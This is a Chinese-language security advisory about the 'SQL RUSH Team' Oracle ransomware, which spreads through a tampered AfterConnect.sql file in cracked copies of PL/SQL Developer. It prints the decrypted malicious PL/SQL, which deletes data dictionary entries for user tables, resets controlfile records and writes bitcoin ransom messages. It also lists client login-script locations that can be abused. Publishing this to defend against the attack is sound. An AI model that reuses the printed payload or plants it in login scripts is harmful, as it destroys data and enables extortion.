最近，很多用戶遭遇到數(shù)據(jù)庫(kù)的安全問(wèn)題，我們?cè)诖颂崾舅蠴racle數(shù)據(jù)庫(kù)用戶關(guān)注此問(wèn)題。

[[176378]]

　　問(wèn)題癥狀：

　　登錄數(shù)據(jù)庫(kù)時(shí)，提示數(shù)據(jù)庫(kù)被鎖死，黑客提示發(fā)送5個(gè)比特幣可以解鎖。

　　在數(shù)據(jù)庫(kù)的日志中，可能獲得的信息如下：

　　ORA-00604: error occurred at recursive SQL level 1

　　ORA-20315: 你的數(shù)據(jù)庫(kù)已被SQL RUSH Team鎖死 發(fā)送5個(gè)比特幣到這個(gè)地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數(shù)據(jù)庫(kù)

　　Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.

　　ORA-06512: at “XXX.DBMS_CORE_INTERNAL ", line 27

　　ORA-06512: at line 2

　　問(wèn)題原因：

　　根據(jù)我們收集的信息分析，這個(gè)問(wèn)題的原因是：

　　如果用戶從某些不明來(lái)源下載了PL/SQL Developer工具后(尤其是各種綠色版、破解版)，這個(gè)工具的安裝目錄存在一個(gè)腳本文件AfterConnect.sql，正常安裝這個(gè)腳本是空文件，但是被注入的文件，該腳本包含了一系列的JOB定義、存儲(chǔ)過(guò)程和觸發(fā)器定義。

　　受感染的AfterConnect.sql腳本開頭偽裝非常正常的代碼：

　　實(shí)質(zhì)內(nèi)容卻是加密的惡意代碼：

　　腳本代碼的核心部分解密后如下：

　　BEGIN

　　SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;

　　IF (DATE1>=1200) THEN

　　EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';

　　DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;

　　COMMIT;

　　EXECUTE IMMEDIATE 'alter system checkpoint';

　　SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);

　　FOR I IN 1..2046 LOOP

　　DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');

　　DBMS_SYSTEM.KSDWRT(2, '你的數(shù)據(jù)庫(kù)已被SQL RUSH Team鎖死 發(fā)送5個(gè)比特幣到這個(gè)地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數(shù)據(jù)庫(kù) ');

　　END LOOP;

　　END IF;

　　END;

　　一旦使用這個(gè)工具訪問(wèn)數(shù)據(jù)庫(kù)，相應(yīng)對(duì)象會(huì)被后臺(tái)自動(dòng)注入數(shù)據(jù)庫(kù)，執(zhí)行觸發(fā)器阻止后續(xù)的用戶登錄，并通過(guò)任務(wù)Truncate數(shù)據(jù)庫(kù)表。

　　我們強(qiáng)烈建議用戶檢查數(shù)據(jù)庫(kù)工具的使用情況，避免使用來(lái)歷不明的工具產(chǎn)品。

　　我們強(qiáng)烈建議：采用正版軟件，規(guī)避未知風(fēng)險(xiǎn)。

　　安全漏洞：

　　幾乎絕大多數(shù)客戶端工具，在訪問(wèn)數(shù)據(jù)庫(kù)時(shí)，都可以通過(guò)腳本進(jìn)行一定的功能定義，而這些腳本往往就是安全問(wèn)題的漏洞之一，來(lái)歷不明的工具是數(shù)據(jù)庫(kù)管理大忌，以下列出了常見客戶端工具的腳本位置，需要引起注意：

　　SQL*Plus: glogin.sql / login.sql

　　TOAD : toad.ini

　　PLSQLdeveloper: login.sql / afterconnect.sql

　　處置建議：

　　如果您的數(shù)據(jù)庫(kù)已經(jīng)遭受攻擊和數(shù)據(jù)損失，可以緊急聯(lián)系云和恩墨的服務(wù)團(tuán)隊(duì)，我們可以幫助您處理數(shù)據(jù)修復(fù)事宜。云和恩墨的ODU產(chǎn)品，可以在數(shù)據(jù)丟失后最大限度的恢復(fù)數(shù)據(jù)。

　　事件回顧：

　　2015年9月，XcodeGhost入侵蘋果iOS事件在業(yè)內(nèi)引起不小震動(dòng)。事件起因?yàn)椴恢诳拖騣OS應(yīng)用開發(fā)工具Xcode植入惡意程序，通過(guò)網(wǎng)盤和論壇上傳播，被感染的App并以此劫持蘋果用戶相關(guān)信息。來(lái)自多個(gè)安全團(tuán)隊(duì)數(shù)據(jù)顯示，病毒感染波及AppStore下載量最高的5000個(gè)App其中的76個(gè)，保守估計(jì)受影響用戶數(shù)超過(guò)一億。

　　2012年2月，中文版putty等SSH遠(yuǎn)程管理工具被曝出存在后門，該后門會(huì)自動(dòng)竊取管理員所輸入的SSH用戶名與口令，并將其發(fā)送至指定服務(wù)器上。